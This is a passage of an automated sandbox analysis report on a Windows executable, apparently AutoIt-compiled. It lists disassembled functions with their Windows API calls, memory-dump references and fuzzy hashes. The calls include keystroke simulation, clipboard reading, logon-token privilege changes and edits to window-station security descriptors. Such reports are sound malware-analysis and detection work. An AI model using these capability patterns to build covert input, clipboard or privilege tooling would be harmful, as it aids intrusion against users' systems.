                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
                                                                    • Instruction ID: ca51e2242a9ba4596f7ea85d6db6aeccfe885bf89c32f0bbdc503813700dc767
                                                                    • Opcode Fuzzy Hash: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
                                                                    • Instruction Fuzzy Hash: 8CD06C3205410DBBDF028F84DD06EDA3BAAFB48714F014050BE1856020C732E861AB90
                                                                    Function 008E1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008E1CBC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem
                                                                    • String ID:
                                                                    • API String ID: 3098949447-0
                                                                    • Opcode ID: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
                                                                    • Instruction ID: 74923f206605c51bd60fe1e2105ea1e383ee658d0192f30e55ccf7ab100116ee
                                                                    • Opcode Fuzzy Hash: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
                                                                    • Instruction Fuzzy Hash: 39C09B3629C3049FF3144780BD5EF107754E348B10F444101F60D555E3D3E22450F750
                                                                    Function 00BE1A64 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 00BE1A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 24e621f6f2eef52aed25a27c7de7826fc27bd7c06d7ac84a4c96ff2bce8ba083
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: 96E0BF7494124EEFDB00DFA8D6496ED7BB4EF04301F1005A5FD05D7680DB309E548A62
                                                                    Function 00BE1A68 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 00BE1A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 7ccc185bd22328ec89e7d3df40233758a98d3406487de4b53d033097f432bed2
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 2FE0E67494124EDFDB00DFB8D6496ED7BF4EF04301F1005A5FD05D2280D7309D508A62

                                                                    Non-executed Functions

                                                                    Function 00979576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0097961A
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097965B
                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0097969F
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009796C9
                                                                    • SendMessageW.USER32 ref: 009796F2
                                                                    • GetKeyState.USER32(00000011), ref: 0097978B
                                                                    • GetKeyState.USER32(00000009), ref: 00979798
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009797AE
                                                                    • GetKeyState.USER32(00000010), ref: 009797B8
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009797E9
                                                                    • SendMessageW.USER32 ref: 00979810
                                                                    • SendMessageW.USER32(?,00001030,?,00977E95), ref: 00979918
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0097992E
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00979941
                                                                    • SetCapture.USER32(?), ref: 0097994A
                                                                    • ClientToScreen.USER32(?,?), ref: 009799AF
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009799BC
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009799D6
                                                                    • ReleaseCapture.USER32 ref: 009799E1
                                                                    • GetCursorPos.USER32(?), ref: 00979A19
                                                                    • ScreenToClient.USER32(?,?), ref: 00979A26
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00979A80
                                                                    • SendMessageW.USER32 ref: 00979AAE
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00979AEB
                                                                    • SendMessageW.USER32 ref: 00979B1A
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00979B3B
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00979B4A
                                                                    • GetCursorPos.USER32(?), ref: 00979B68
                                                                    • ScreenToClient.USER32(?,?), ref: 00979B75
                                                                    • GetParent.USER32(?), ref: 00979B93
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00979BFA
                                                                    • SendMessageW.USER32 ref: 00979C2B
                                                                    • ClientToScreen.USER32(?,?), ref: 00979C84
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00979CB4
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00979CDE
                                                                    • SendMessageW.USER32 ref: 00979D01
                                                                    • ClientToScreen.USER32(?,?), ref: 00979D4E
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00979D82
                                                                      • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00979E05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3429851547-4164748364
                                                                    • Opcode ID: 12d72473ad76ab484c8e0f0709cc9ffd1236096c8582bbb16a9d0426b2a4cd77
                                                                    • Instruction ID: e019a6dcb2e108706d1d2e8040a9117aa28c5f2e469d63916f2fdb9115613a5d
                                                                    • Opcode Fuzzy Hash: 12d72473ad76ab484c8e0f0709cc9ffd1236096c8582bbb16a9d0426b2a4cd77
                                                                    • Instruction Fuzzy Hash: 07429F72208241AFD724CF28CC84EAABBE9FF49724F14861DF69D872A1D731E850DB51
                                                                    Function 00974873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009748F3
                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00974908
                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00974927
                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0097494B
                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0097495C
                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0097497B
                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009749AE
                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009749D4
                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00974A0F
                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A56
                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A7E
                                                                    • IsMenu.USER32(?), ref: 00974A97
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974AF2
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974B20
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00974B94
                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00974BE3
                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00974C82
                                                                    • wsprintfW.USER32 ref: 00974CAE
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974CC9
                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00974CF1
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00974D13
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974D33
                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00974D5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 4054740463-328681919
                                                                    • Opcode ID: 17e24f206e742168ba392b1d936f3ade60358d7a943aa60e366ccceb38ed227f
                                                                    • Instruction ID: f903ff482444356f82bb6a63bc460559fce8aa3f1ab6b89e814dd0ac2b6d8af2
                                                                    • Opcode Fuzzy Hash: 17e24f206e742168ba392b1d936f3ade60358d7a943aa60e366ccceb38ed227f
                                                                    • Instruction Fuzzy Hash: F512D172600259ABEB258F28CC49FAE7BF8FF85710F108529F51ADB2E2D7749941CB50
                                                                    Function 008FF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 008FF998
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093F474
                                                                    • IsIconic.USER32(00000000), ref: 0093F47D
                                                                    • ShowWindow.USER32(00000000,00000009), ref: 0093F48A
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0093F494
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4AA
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0093F4B1
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4BD
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4CE
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4D6
                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0093F4DE
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0093F4E1
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F4F6
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F501
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F50B
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F510
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F519
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F51E
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F528
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0093F52D
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0093F530
                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0093F557
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
                                                                    • Instruction ID: b1bd0d4e5a3bbf9f520df1b4909ad01dd5e1fdb025e210e326d5bef981a8d6da
                                                                    • Opcode Fuzzy Hash: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
                                                                    • Instruction Fuzzy Hash: F73154B2E54218BBEB206BB55C4AFBF7E6CEB44B50F100469F605EA1D1C6B15D40BE60
                                                                    Function 00941201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                      • Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                      • Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A
                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00941286
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009412A8
                                                                    • CloseHandle.KERNEL32(?), ref: 009412B9
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009412D1
                                                                    • GetProcessWindowStation.USER32 ref: 009412EA
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 009412F4
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00941310
                                                                      • Part of subcall function 009410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
                                                                      • Part of subcall function 009410BF: CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 22674027-1027155976
                                                                    • Opcode ID: b3cb13863f2ea7eb66fc1848e527e9765101f0f6477c339c27aa9520c1c2d868
                                                                    • Instruction ID: 58698ff75fdb97ed078b3c8e341eb587243f3ff4aff9026a33b1df1472d30973
                                                                    • Opcode Fuzzy Hash: b3cb13863f2ea7eb66fc1848e527e9765101f0f6477c339c27aa9520c1c2d868
                                                                    • Instruction Fuzzy Hash: 00819AB2A00209AFDF209FA4DC49FEE7BBDEF44704F144129FA14E62A0D7349984DB65
                                                                    Function 00940B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                      • Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                      • Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                      • Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940BCC
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940C00
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940C17
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00940C51
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940C6D
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940C84
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940C8C
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00940C93
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940CB4
                                                                    • CopySid.ADVAPI32(00000000), ref: 00940CBB
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940CEA
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940D0C
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940D1E
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D45
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D4C
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D55
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D5C
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D65
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D6C
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00940D78
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D7F
                                                                      • Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
                                                                      • Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
                                                                      • Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
                                                                    • Instruction ID: bd1159240d0415ea3bd1097e988bec0e61d8e110279b4679fb9d4f49d495d3cf
                                                                    • Opcode Fuzzy Hash: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
                                                                    • Instruction Fuzzy Hash: 44716EB290420AABDF10DFE4DC45FAEBBBCBF84300F044529EA18A7191D771A945CBA0
                                                                    Function 0095EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(0097CC08), ref: 0095EB29
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0095EB37
                                                                    • GetClipboardData.USER32(0000000D), ref: 0095EB43
                                                                    • CloseClipboard.USER32 ref: 0095EB4F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0095EB87
                                                                    • CloseClipboard.USER32 ref: 0095EB91
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0095EBBC
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0095EBC9
                                                                    • GetClipboardData.USER32(00000001), ref: 0095EBD1
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0095EBE2
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0095EC22
                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0095EC38
                                                                    • GetClipboardData.USER32(0000000F), ref: 0095EC44
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0095EC55
                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0095EC77
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095EC94
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095ECD2
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0095ECF3
                                                                    • CountClipboardFormats.USER32 ref: 0095ED14
                                                                    • CloseClipboard.USER32 ref: 0095ED59
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                    • String ID:
                                                                    • API String ID: 420908878-0
                                                                    • Opcode ID: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
                                                                    • Instruction ID: aeede31ff343e18d112ee79684afe52225fe84e8a679869ef18ae32dbe32cce2
                                                                    • Opcode Fuzzy Hash: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
                                                                    • Instruction Fuzzy Hash: 7761D1752082029FD304EF26D889F2A77A8FF84705F14451DF85AC72A2DB72DE49DB62
                                                                    Function 0095698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009569BE
                                                                    • FindClose.KERNEL32(00000000), ref: 00956A12
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A4E
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A75
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00956AB2
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00956ADF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                    • API String ID: 3830820486-3289030164
                                                                    • Opcode ID: 7cecf4b84e751917be0963f7198a373aed9ef64537de33859dced6f7fbe21b89
                                                                    • Instruction ID: d0fe218a08402e98e54c4fbe6c4ce9498ea3d8539b023c952c8c45a03cdc0d86
                                                                    • Opcode Fuzzy Hash: 7cecf4b84e751917be0963f7198a373aed9ef64537de33859dced6f7fbe21b89
                                                                    • Instruction Fuzzy Hash: 30D13E72508340AAC710EBA5C882EABB7ECFF99704F44491DF995C7191EB74DA48CB63
                                                                    Function 00959642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00959663
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009596A1
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 009596BB
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009596D3
                                                                    • FindClose.KERNEL32(00000000), ref: 009596DE
